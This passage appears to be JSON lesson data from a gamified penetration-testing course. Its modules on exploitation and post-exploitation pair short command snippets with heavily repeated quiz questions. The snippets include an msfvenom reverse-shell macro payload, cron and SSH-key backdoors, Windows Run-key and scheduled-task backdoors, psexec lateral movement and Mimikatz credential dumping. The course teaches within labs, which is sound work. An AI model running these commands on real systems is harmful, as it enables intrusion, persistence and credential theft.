ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"aslr-bypass","cat":"Exploitation","title":"ASLR Bypass","diff":3,"xp":250,"intro":"Defeat address randomization.","sections":[{"type":"text","content":"Defeat address randomization."},{"type":"code","lang":"bash","content":"# Info leak reveals runtime address\n# Brute force (32-bit): 256-65536 attempts\n# Return-to-PLT: fixed addresses"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Info leak defeats ASLR by?","opts":["Disabling it","Revealing a runtime address","Permissions","Rebooting"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"searchsploit","cat":"Exploitation","title":"SearchSploit","diff":1,"xp":75,"intro":"Offline exploit search.","sections":[{"type":"text","content":"Offline exploit search."},{"type":"code","lang":"bash","content":"searchsploit apache 2.4.49\nsearchsploit -m 50383"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"SearchSploit searches?","opts":["CVE","ExploitDB","NVD","Metasploit"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"phish-payload","cat":"Exploitation","title":"Phishing Payloads","diff":2,"xp":150,"intro":"Craft phishing documents.","sections":[{"type":"text","content":"Craft phishing documents."},{"type":"code","lang":"bash","content":"msfvenom -p windows/meterpreter/reverse_tcp -f vba-psh"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Office payload feature?","opts":["Formulas","VBA Macros","Animations","Charts"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"custom-enc","cat":"Exploitation","title":"Custom Encoding","diff":3,"xp":200,"intro":"Write payload encoders.","sections":[{"type":"text","content":"Write payload encoders."},{"type":"code","lang":"python","content":"# XOR encoder\nencoded = bytes([b ^ 0x42 for b in shellcode])"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Simplest encoding?","opts":["AES","XOR single-byte","Base64","ROT13"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"persist-lin","cat":"Post-Exploitation","title":"Linux Persistence","diff":2,"xp":150,"intro":"Maintain access.","sections":[{"type":"text","content":"Maintain access."},{"type":"code","lang":"bash","content":"(crontab -l;echo '* * * * * /tmp/shell.sh')|crontab -\necho 'ssh-rsa ...' >> ~/.ssh/authorized_keys"},{"type":"text","content":"Post-exploitation is where the real work begins. Getting a shell is just the starting point \u2014 the value comes from understanding the environment, finding sensitive data, mapping the network, and demonstrating business impact. Document everything: what you accessed, how you got there, and what the real-world risk is."},{"type":"tip","content":"Treat every engagement as if you're writing the report while you work. Screenshot every finding, log every command, and note the timestamp. When you find sensitive data, don't just prove access \u2014 explain the business impact: 'This database contains 50,000 customer credit card numbers' hits harder than 'I got a database shell.'"},{"type":"task","content":"Set up an Active Directory lab with at least a Domain Controller and two workstations. Practice the full post-exploitation chain: enumerate the domain, find a path to Domain Admin (use BloodHound), execute the attack path, and then write a professional finding for the report."},{"type":"quiz","q":"Survives reboots?","opts":["Cron","All if configured correctly","Bashrc only","SSH only"],"ans":0},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"persist-win","cat":"Post-Exploitation","title":"Windows Persistence","diff":2,"xp":150,"intro":"Maintain Windows access.","sections":[{"type":"text","content":"Maintain Windows access."},{"type":"code","lang":"bash","content":"reg add HKCU...Run /v backdoor /d C:\\backdoor.exe\nschtasks /create /sc minute /tn Update /tr C:\\backdoor.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Auto-run registry?","opts":["HKLMSYSTEM","HKCU...Run","HKLMSAM","HKCUControl"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"lat-move","cat":"Post-Exploitation","title":"Lateral Movement","diff":2,"xp":150,"intro":"Move through the network.","sections":[{"type":"text","content":"Move through the network."},{"type":"code","lang":"bash","content":"psexec.py domain/admin:pass@target\nwmiexec.py domain/admin:pass@target"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Lateral movement is?","opts":["Privesc","Moving between compromised hosts","Exfil","Persistence"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"mimikatz","cat":"Post-Exploitation","title":"Mimikatz Credentials","diff":2,"xp":175,"intro":"Dump Windows creds.","sections":[{"type":"text","content":"Dump Windows creds."},{"type":"code","lang":"bash","content":"mimikatz# privilege::debug\nmimikatz# sekurlsa::logonpasswords"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Mimikatz dumps from?","opts":["svchost","LSASS","explorer","winlogon"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is 